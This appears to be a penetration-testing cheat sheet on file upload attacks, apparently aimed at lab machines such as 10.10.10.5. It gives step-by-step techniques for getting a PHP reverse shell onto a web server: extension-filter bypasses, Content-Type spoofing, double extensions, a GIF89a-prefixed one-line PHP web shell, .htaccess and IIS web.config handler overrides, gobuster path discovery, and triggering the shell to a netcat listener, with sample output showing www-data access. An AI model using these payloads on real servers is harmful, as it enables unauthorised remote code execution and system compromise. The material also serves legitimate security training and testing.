FILE UPLOAD ATTACKS

Upload PHP reverse shell

Basic upload attempt — Check if .php is allowed

Upload pentestmonkey php-reverse-shell.php
Example Output
Upload pentestmonkey shell as shell.php
Response: 'File uploaded successfully'
Browse to: http://10.10.10.5/uploads/shell.php

nc -nlvp 443:
connect to [ATTACKER] from [10.10.10.5]
$ whoami
www-data

Bypass extension filter

Try alternative extensions — Different PHP handlers

shell.php5
shell.phtml
shell.phar
shell.phps
shell.php.jpg
shell.PHP
shell.php%00.jpg
Example Output
shell.php    -> 'File type not allowed'
shell.php5   -> 'File type not allowed'
shell.phtml  -> 'File uploaded successfully!'
(phtml bypassed the filter)

Bypass content-type check

Intercept and modify — Server checks MIME type only

Change Content-Type header to image/jpeg in Burp
Example Output
In Burp, change:
Content-Type: application/x-php
To:
Content-Type: image/jpeg

Server response: 'File uploaded successfully'
(Server only checked MIME type, not actual content)

Double extension

Confuse extension parsing — Some servers check last/first ext

shell.php.png
shell.jpg.php
Example Output
shell.php.png -> 'Uploaded successfully'
But Apache processes .php first
Browse: http://10.10.10.5/uploads/shell.php.png
$ whoami
www-data

Magic bytes bypass

Bypass magic byte checks — File starts as valid image

Add GIF89a; to start of PHP file
Or embed PHP in image EXIF
Example Output
Add GIF89a; at top of PHP shell:
GIF89a;
<?php system($_GET['cmd']); ?>

Upload as shell.gif.php or shell.php
Server sees GIF magic bytes, allows upload

Upload .htaccess

Change how server handles files — Make .jpg execute as PHP

Upload .htaccess:
AddType application/x-httpd-php .jpg
Then upload shell.jpg
Example Output
Upload .htaccess containing:
AddType application/x-httpd-php .jpg

Then upload shell.jpg (with PHP code inside)
Browse: http://10.10.10.5/uploads/shell.jpg
$ whoami
www-data
(.jpg now executes as PHP)

Upload web.config (IIS)

IIS equivalent of .htaccess — ASP/ASPX execution

Upload web.config with handler for .jpg as ASP
Example Output
Upload web.config:
<handlers>
  <add name='aspnet' path='*.jpg' verb='*' type='System.Web.UI.PageHandlerFactory'/>
</handlers>

Upload shell.jpg with ASP code
Browse to execute
(IIS treats .jpg as ASP)

Find upload location

Where did the file go? — Need path to trigger execution

Check response, view source, or gobuster
Example Output
Response: 'File uploaded to /uploads/shell.php'
OR: View source -> <img src='/uploads/shell.php'>
OR: gobuster dir -u http://10.10.10.5 -w wordlist.txt
  /uploads/ (Status: 301)
(Need the path to trigger your shell)

Trigger uploaded shell

Execute your uploaded file — Start netcat listener first

curl http://$IP/uploads/shell.php
or browse to it
Example Output
nc -nlvp 443
curl http://10.10.10.5/uploads/shell.php

Listening on 0.0.0.0 443
Connection received from 10.10.10.5
$ whoami
www-data
(Reverse shell caught!)